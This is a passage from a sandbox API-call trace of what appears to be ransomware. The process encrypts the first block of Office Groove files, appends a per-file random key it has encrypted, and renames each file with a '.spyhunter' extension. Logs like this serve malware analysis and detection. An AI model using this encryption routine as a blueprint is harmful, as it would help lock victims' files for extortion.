lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfabc*=0x2800, lpOverlapped=0x0) returned 1 [0108.579] GetProcessHeap () returned 0x2c0000 [0108.579] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0108.579] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.579] WriteFile (in: hFile=0x154, lpBuffer=0x25cfafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfabc, lpOverlapped=0x0 | out: lpBuffer=0x25cfafc*, lpNumberOfBytesWritten=0x25cfabc*=0x4, lpOverlapped=0x0) returned 1 [0109.151] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfabc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfabc*=0x30, lpOverlapped=0x0) returned 1 [0109.151] CloseHandle (hObject=0x154) returned 1 [0109.151] GetProcessHeap () returned 0x2c0000 [0109.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.151] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html.spyhunter") returned 122 [0109.151] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formspreviewtemplate.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsPreviewTemplate.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formspreviewtemplate.html.spyhunter")) returned 1 [0109.152] GetProcessHeap () returned 0x2c0000 [0109.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.152] GetProcessHeap () returned 0x2c0000 [0109.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.152] GetProcessHeap () returned 0x2c0000 [0109.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x317f88 | out: hHeap=0x2c0000) returned 1 [0109.152] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfb00 | out: pbBuffer=0x25cfb00) returned 1 [0109.152] GetProcessHeap () returned 0x2c0000 [0109.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.152] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfaf8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfaf8*=0x30) returned 1 [0109.153] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagescript.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0109.153] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageScript.js") returned 109 [0109.153] StrStrW (lpFirst="FormsHomePageScript.js", lpSrch=".txt") returned 0x0 [0109.153] GetProcessHeap () returned 0x2c0000 [0109.153] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.153] ReadFile (in: hFile=0x154, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfabc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfabc*=0x1e87, lpOverlapped=0x0) returned 1 [0109.223] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffe179, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.223] WriteFile (in: hFile=0x154, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x1e87, lpNumberOfBytesWritten=0x25cfabc, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25cfabc*=0x1e87, lpOverlapped=0x0) returned 1 [0109.224] GetProcessHeap () returned 0x2c0000 [0109.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0109.224] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.224] WriteFile (in: hFile=0x154, lpBuffer=0x25cfafc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfabc, lpOverlapped=0x0 | out: lpBuffer=0x25cfafc*, lpNumberOfBytesWritten=0x25cfabc*=0x4, lpOverlapped=0x0) returned 1 [0109.224] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfabc, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfabc*=0x30, lpOverlapped=0x0) returned 1 [0109.224] CloseHandle (hObject=0x154) returned 1 [0109.224] GetProcessHeap () returned 0x2c0000 [0109.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.224] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageScript.js.spyhunter") returned 119 [0109.224] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageScript.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagescript.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsHomePageScript.js.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formshomepagescript.js.spyhunter")) returned 1 [0109.225] GetProcessHeap () returned 0x2c0000 [0109.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.225] GetProcessHeap () returned 0x2c0000 [0109.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.225] GetProcessHeap () returned 0x2c0000 [0109.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e213d0 | out: hHeap=0x2c0000) returned 1 [0109.225] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfaf8 | out: pbBuffer=0x25cfaf8) returned 1 [0109.225] GetProcessHeap () returned 0x2c0000 [0109.225] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.225] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfaf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfaf0*=0x30) returned 1 [0109.226] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GreenTea.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\greentea.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0109.281] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GreenTea.css") returned 111 [0109.281] StrStrW (lpFirst="GreenTea.css", lpSrch=".txt") returned 0x0 [0109.281] GetProcessHeap () returned 0x2c0000 [0109.281] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.281] ReadFile (in: hFile=0x16c, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfab4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfab4*=0x762, lpOverlapped=0x0) returned 1 [0109.308] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffff89e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.309] WriteFile (in: hFile=0x16c, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x762, lpNumberOfBytesWritten=0x25cfab4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfab4*=0x762, lpOverlapped=0x0) returned 1 [0109.313] GetProcessHeap () returned 0x2c0000 [0109.313] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.313] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.313] WriteFile (in: hFile=0x16c, lpBuffer=0x25cfaf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfab4, lpOverlapped=0x0 | out: lpBuffer=0x25cfaf4*, lpNumberOfBytesWritten=0x25cfab4*=0x4, lpOverlapped=0x0) returned 1 [0109.313] WriteFile (in: hFile=0x16c, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfab4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfab4*=0x30, lpOverlapped=0x0) returned 1 [0109.313] CloseHandle (hObject=0x16c) returned 1 [0109.637] GetProcessHeap () returned 0x2c0000 [0109.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e44b78 [0109.638] wnsprintfW (in: pszDest=0x2e44b78, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GreenTea.css.spyhunter") returned 121 [0109.638] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GreenTea.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\greentea.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\GreenTea.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\greentea.css.spyhunter")) returned 1 [0109.639] GetProcessHeap () returned 0x2c0000 [0109.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e44b78 | out: hHeap=0x2c0000) returned 1 [0109.639] GetProcessHeap () returned 0x2c0000 [0109.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.640] GetProcessHeap () returned 0x2c0000 [0109.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21be8 | out: hHeap=0x2c0000) returned 1 [0109.640] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfaf8 | out: pbBuffer=0x25cfaf8) returned 1 [0109.640] GetProcessHeap () returned 0x2c0000 [0109.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.640] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfaf0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfaf0*=0x30) returned 1 [0109.640] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.665] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue.css") returned 111 [0109.665] StrStrW (lpFirst="SoftBlue.css", lpSrch=".txt") returned 0x0 [0109.665] GetProcessHeap () returned 0x2c0000 [0109.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.665] ReadFile (in: hFile=0xb4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfab4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfab4*=0x11ca, lpOverlapped=0x0) returned 1 [0109.685] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffee36, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.685] WriteFile (in: hFile=0xb4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x11ca, lpNumberOfBytesWritten=0x25cfab4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfab4*=0x11ca, lpOverlapped=0x0) returned 1 [0109.685] GetProcessHeap () returned 0x2c0000 [0109.685] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.685] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.685] WriteFile (in: hFile=0xb4, lpBuffer=0x25cfaf4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfab4, lpOverlapped=0x0 | out: lpBuffer=0x25cfaf4*, lpNumberOfBytesWritten=0x25cfab4*=0x4, lpOverlapped=0x0) returned 1 [0109.685] WriteFile (in: hFile=0xb4, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfab4, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfab4*=0x30, lpOverlapped=0x0) returned 1 [0109.685] CloseHandle (hObject=0xb4) returned 1 [0109.686] GetProcessHeap () returned 0x2c0000 [0109.686] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e349e8 [0109.686] wnsprintfW (in: pszDest=0x2e349e8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue.css.spyhunter") returned 121 [0109.686] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SoftBlue.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\softblue.css.spyhunter")) returned 1 [0109.697] GetProcessHeap () returned 0x2c0000 [0109.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e349e8 | out: hHeap=0x2c0000) returned 1 [0109.697] GetProcessHeap () returned 0x2c0000 [0109.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.697] GetProcessHeap () returned 0x2c0000 [0109.697] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x319d80 | out: hHeap=0x2c0000) returned 1 [0109.697] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfaf0 | out: pbBuffer=0x25cfaf0) returned 1 [0109.697] GetProcessHeap () returned 0x2c0000 [0109.697] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.697] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfae8*=0x30) returned 1 [0109.697] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\tab_off.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0109.711] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_OFF.GIF") returned 122 [0109.711] StrStrW (lpFirst="TAB_OFF.GIF", lpSrch=".txt") returned 0x0 [0109.711] GetProcessHeap () returned 0x2c0000 [0109.711] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0109.711] ReadFile (in: hFile=0x154, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfaac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cfaac*=0x155, lpOverlapped=0x0) returned 1 [0109.713] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffeab, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.713] WriteFile (in: hFile=0x154, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x155, lpNumberOfBytesWritten=0x25cfaac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cfaac*=0x155, lpOverlapped=0x0) returned 1 [0109.713] GetProcessHeap () returned 0x2c0000 [0109.713] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0109.713] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.713] WriteFile (in: hFile=0x154, lpBuffer=0x25cfaec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfaac, lpOverlapped=0x0 | out: lpBuffer=0x25cfaec*, lpNumberOfBytesWritten=0x25cfaac*=0x4, lpOverlapped=0x0) returned 1 [0109.713] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfaac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfaac*=0x30, lpOverlapped=0x0) returned 1 [0109.713] CloseHandle (hObject=0x154) returned 1 [0109.713] GetProcessHeap () returned 0x2c0000 [0109.714] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.714] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_OFF.GIF.spyhunter") returned 132 [0109.714] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_OFF.GIF" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\tab_off.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\SpringGreen\\TAB_OFF.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\springgreen\\tab_off.gif.spyhunter")) returned 1 [0109.714] GetProcessHeap () returned 0x2c0000 [0109.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.714] GetProcessHeap () returned 0x2c0000 [0109.714] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.714] GetProcessHeap () returned 0x2c0000 [0109.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e34248 | out: hHeap=0x2c0000) returned 1 [0109.715] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfaf0 | out: pbBuffer=0x25cfaf0) returned 1 [0109.715] GetProcessHeap () returned 0x2c0000 [0109.715] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.715] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfae8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfae8*=0x30) returned 1 [0109.715] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0109.788] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate.css") returned 108 [0109.788] StrStrW (lpFirst="Slate.css", lpSrch=".txt") returned 0x0 [0109.789] GetProcessHeap () returned 0x2c0000 [0109.789] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.789] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfaac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cfaac*=0x10d7, lpOverlapped=0x0) returned 1 [0109.790] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffef29, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.790] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x10d7, lpNumberOfBytesWritten=0x25cfaac, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cfaac*=0x10d7, lpOverlapped=0x0) returned 1 [0109.790] GetProcessHeap () returned 0x2c0000 [0109.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.791] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.791] WriteFile (in: hFile=0x154, lpBuffer=0x25cfaec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cfaac, lpOverlapped=0x0 | out: lpBuffer=0x25cfaec*, lpNumberOfBytesWritten=0x25cfaac*=0x4, lpOverlapped=0x0) returned 1 [0109.791] WriteFile (in: hFile=0x154, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cfaac, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x25cfaac*=0x30, lpOverlapped=0x0) returned 1 [0109.791] CloseHandle (hObject=0x154) returned 1 [0109.791] GetProcessHeap () returned 0x2c0000 [0109.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0109.792] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate.css.spyhunter") returned 118 [0109.792] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Slate.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\slate.css.spyhunter")) returned 1 [0109.793] GetProcessHeap () returned 0x2c0000 [0109.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0109.793] GetProcessHeap () returned 0x2c0000 [0109.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0109.793] GetProcessHeap () returned 0x2c0000 [0109.793] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31aa38 | out: hHeap=0x2c0000) returned 1 [0109.793] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cfae8 | out: pbBuffer=0x25cfae8) returned 1 [0109.793] GetProcessHeap () returned 0x2c0000 [0109.793] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0109.793] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x25cfae0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x25cfae0*=0x30) returned 1 [0109.793] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveprojecttoolset\\projecttaskicon.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0109.799] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveProjectToolset\\ProjectTaskIcon.jpg") returned 114 [0109.799] StrStrW (lpFirst="ProjectTaskIcon.jpg", lpSrch=".txt") returned 0x0 [0109.800] GetProcessHeap () returned 0x2c0000 [0109.800] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0109.800] ReadFile (in: hFile=0xb4, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cfaa4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25cfaa4*=0x200e, lpOverlapped=0x0) returned 1 [0109.839] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffdff2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.839] WriteFile 